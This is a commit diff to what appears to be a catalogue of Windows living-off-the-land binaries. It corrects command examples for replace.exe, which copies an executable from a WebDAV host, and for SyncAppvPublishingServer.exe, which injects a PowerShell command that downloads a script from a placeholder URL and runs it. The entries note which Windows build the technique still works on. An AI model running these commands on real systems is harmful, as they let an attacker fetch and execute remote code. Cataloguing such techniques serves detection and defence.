commit
1e9ae3aa9b
|
@ -40,6 +40,7 @@ c:\windows\sysWOW64\bitsadmin.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
|
* Requires active user (doesn't work from a web shell)
|
||||||
|
|
||||||
|
|
||||||
Detection:
|
Detection:
|
||||||
|
|
|
@ -5,7 +5,7 @@
|
||||||
```
|
```
|
||||||
replace c:\source\file.cab c:\destination /A
|
replace c:\source\file.cab c:\destination /A
|
||||||
|
|
||||||
replace \\http://webdav.host.com \foo\bar.exe c:\outdir /A
|
replace \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,7 @@
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
|
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
|
@ -23,6 +23,6 @@ C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||||
Notes:
|
Notes:
|
||||||
Command injection into PowerShell
|
Command injection into PowerShell
|
||||||
Might have been fixed in newest version of Windows 10.
|
Might have been fixed in newest version of Windows 10.
|
||||||
|
(Works as of 10.0.16299.371)
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue